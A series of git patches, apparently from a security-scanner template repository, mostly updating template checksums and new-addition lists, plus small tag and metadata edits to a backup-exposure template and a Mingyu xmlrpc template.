@@ -7046,7 +7046,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:377bfc06a71b3291d9ddbc2bd460103c4e3c222b +templates-checksum.txt:53692d2054750574ac6e2dd15a9836497e7fbe17 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 951b74dfb92c56dd6fd7335c3521f6459fcefb9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 08:31:04 +0000 Subject: [PATCH 0178/1090] TemplateMan Update [Wed Sep 6 08:31:04 UTC 2023] :robot: --- http/exposures/backups/zip-backup-files.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index e8f8b03965..3973677306 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,backup metadata: - max-request: 600 + max-request: 625 + tags: exposure,backup http: - method: GET From 28f0118a535a1f98830b4366b1aa15361a60f630 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 14:53:16 +0530 Subject: [PATCH 0179/1090] updated tag --- http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml index 7dba143cc2..0fe9125a39 100644 --- a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml +++ b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true fofa-query: "明御运维审计与风险控制系统" - tags: mingyu,xmlrpc,sock,intrusive,user-add + tags: mingyu,xmlrpc,sock,intrusive,misconfig variables: username: "{{rand_base(6)}}" From 67f6a765ce0731fd6d45d9796697ec4795dde088 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 09:26:25 +0000 Subject: [PATCH 0180/1090] Auto Generated New Template Addition List [Wed Sep 6 09:26:25 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2ca42906cc..7b3cb779af 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/snapcomms-panel.yaml http/miscellaneous/external-service-interaction.yaml http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml +http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml http/misconfiguration/missing-sri.yaml http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml From d775869aa7abc6d70180b2e339e1ef9b49ff1080 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 09:26:38 +0000 Subject: [PATCH 0181/1090] Auto Generated Templates Checksum [Wed Sep 6 09:26:38 UTC 2023] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b5878bdb7a..7eb3fa8510 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3737,7 +3737,7 @@ http/exposures/backups/froxlor-database-backup.yaml:0fb55f6f7b2bd1da99d93ee3302e http/exposures/backups/php-backup-files.yaml:6cb103c5d1b0411ea1d4dfe7ab76ea9bb091ebb4 http/exposures/backups/settings-php-files.yaml:3771e96806d801cffb1487210005d2d5087c78ca http/exposures/backups/sql-dump.yaml:f8b9dca037c8252e09216225933cfd7fb9a73569 -http/exposures/backups/zip-backup-files.yaml:3a7e10da3c00683a587c471142a1557b562eb7d4 +http/exposures/backups/zip-backup-files.yaml:c19e1cc358346719f1a0f3a661a43f61e5628201 http/exposures/configs/accueil-wampserver.yaml:fad681eaed5556d727cf838ee18b1c644069830e http/exposures/configs/airflow-configuration-exposure.yaml:df07df94c4f1f5513baf276766346dd690d811ed http/exposures/configs/alibaba-canal-info-leak.yaml:becacef64b37becfcfe2009fc4f57a7ce8fbd264 @@ -4548,6 +4548,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:6282099865efd5333ab1e0b6617c http/misconfiguration/locust-exposure.yaml:879e0cf501e075b201fef057ca84e2b4f4483823 http/misconfiguration/lvm-exporter-metrics.yaml:6c4969c2057c4d8223d1eed2a8c214730efb1f74 http/misconfiguration/manage-engine-ad-search.yaml:a9d037e57c36bd56b8a340075fe95c37884b3c1d +http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:73db5ef3f68413081221de3a72767d8f74696e6f http/misconfiguration/misconfigured-concrete5.yaml:fbd7e1060eeb23bec6e4331af978576619e8a704 http/misconfiguration/misconfigured-docker.yaml:3ba99bbaca7efee00abd6078950a59b3299f343f http/misconfiguration/missing-sri.yaml:e55af741cda0539ee4b8b9527fa7b8fc23b21b6c @@ -5804,218 +5805,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 